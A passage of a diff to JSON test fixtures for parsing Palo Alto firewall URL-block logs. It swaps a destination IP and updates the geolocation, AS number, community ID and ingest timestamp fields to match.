"175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767747167Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691703400Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -1555,26 +1573,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1590,14 +1610,14 @@ "port": 52991, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -1612,7 +1632,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:CmZ6KkZzaxpkJHXJn0lNskvvZLA=" + "community_id": "1:5rwb8J6rmssdijg+3ykoVWJmGIk=" } }, "threat_category": "unknown", @@ -1657,8 +1677,8 @@ ], "network": { "community_id": [ - "1:pWCQCkwDKmw2APwAJ2GcT6QNXQg=", - "1:CmZ6KkZzaxpkJHXJn0lNskvvZLA=" + "1:JceyMqOZwQcAC72gCLYjEBvknTU=", + "1:5rwb8J6rmssdijg+3ykoVWJmGIk=" ], "transport": "tcp", "application": "ssl", @@ -1697,14 +1717,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767751357Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691709700Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -1727,26 +1747,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1762,14 +1784,14 @@ "port": 52994, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -1784,7 +1806,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:Xy6vXuBmLPx1/PDpu/KMI1ZPnW0=" + "community_id": "1:OAkTnLpglosxVTnxgz9yCJ+kNKU=" } }, "threat_category": "unknown", @@ -1829,8 +1851,8 @@ ], "network": { "community_id": [ - "1:3V7ODANn0gD6PFiGWb7LVZcr3TY=", - "1:Xy6vXuBmLPx1/PDpu/KMI1ZPnW0=" + "1:o2VUSGEGaUzspyZmCohGXq3Yp6c=", + "1:OAkTnLpglosxVTnxgz9yCJ+kNKU=" ], "transport": "tcp", "application": "ssl", @@ -1869,14 +1891,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767755350Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691716Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -1899,26 +1921,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1934,14 +1958,14 @@ "port": 52993, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -1956,7 +1980,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:nmxmtIja0z/MV5rgbBnScsKtW0U=" + "community_id": "1:14+dKaa+npbZrUoZzTEXAyUyalI=" } }, "threat_category": "unknown", @@ -2001,8 +2025,8 @@ ], "network": { "community_id": [ - "1:7WQBEq/QCPNFLId7r93vN98nPHQ=", - "1:nmxmtIja0z/MV5rgbBnScsKtW0U=" + "1:N1CGJBV+0yN9Cp8eJgHpxgGyEVA=", + "1:14+dKaa+npbZrUoZzTEXAyUyalI=" ], "transport": "tcp", "application": "ssl", @@ -2041,14 +2065,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767759816Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691721800Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -2071,26 +2095,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2106,14 +2132,14 @@ "port": 52995, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -2128,7 +2154,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:XNlHvX7cDGGCkvSS/aFHGg/RnAk=" + "community_id": "1:ed4O7fFnJ6AA/awMAUE+Im+hdNc=" } }, "threat_category": "unknown", @@ -2173,8 +2199,8 @@ ], "network": { "community_id": [ - "1:r3rve3ghPTa/BACcRlan0FEgZFw=", - "1:XNlHvX7cDGGCkvSS/aFHGg/RnAk=" + "1:CwI0KrtlUFKG8upcnDiYYE+GkUI=", + "1:ed4O7fFnJ6AA/awMAUE+Im+hdNc=" ], "transport": "tcp", "application": "ssl", @@ -2213,14 +2239,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767763873Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691725600Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -2243,26 +2269,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2278,14 +2306,14 @@ "port": 52996, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -2300,7 +2328,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:DqCF4BufQU/spPG8UYok6IrChWo=" + "community_id": "1:jp+mA7ZKjzFOY6ps3Rfq/Qx1GvE=" } }, "threat_category": "unknown", @@ -2345,8 +2373,8 @@ ], "network": { "community_id": [ - "1:2A2PtRAEa2EIbgp0B+6pQMVyM1o=", - "1:DqCF4BufQU/spPG8UYok6IrChWo=" + "1:GkRYVeH+1+wl9KsJ3K/KmY8oDEo=", + "1:jp+mA7ZKjzFOY6ps3Rfq/Qx1GvE=" ], "transport": "tcp", "application": "ssl", @@ -2385,14 +2413,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767767900Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691730700Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -2415,26 +2443,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2450,14 +2480,14 @@ "port": 52997, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -2472,7 +2502,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:lJHLfl+/x95GohXozN52zokIxvA=" + "community_id": "1:F4oaoq7MzD8qqnUI8lIfWI9TLuA=" } }, "threat_category": "unknown", @@ -2517,8 +2547,8 @@ ], "network": { "community_id": [ - "1:ttgSlbqHs+GKueSexHsquCbfjCk=", - "1:lJHLfl+/x95GohXozN52zokIxvA=" + "1:4sDj5hLfDuV0wr0fY/UoICr4zMI=", + "1:F4oaoq7MzD8qqnUI8lIfWI9TLuA=" ], "transport": "tcp", "application": "ssl", @@ -2557,14 +2587,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767771951Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691736400Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -2587,26 +2617,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2622,14 +2654,14 @@ "port": 52998, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -2644,7 +2676,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:OVE3ctnTt5X1L6qNDr4QILL0dFg=" + "community_id": "1:F3RR35PJD5v+Urj2swhFKPNEW48=" } }, "threat_category": "unknown", @@ -2689,8 +2721,8 @@ ], "network": { "community_id": [ - "1:h4Yhxi4lfeFiizTNiugYzEk9CM4=", - "1:OVE3ctnTt5X1L6qNDr4QILL0dFg=" + "1:vU7VzL3Xj2eUkxkv9pv4sbP7Yz4=", + "1:F3RR35PJD5v+Urj2swhFKPNEW48=" ], "transport": 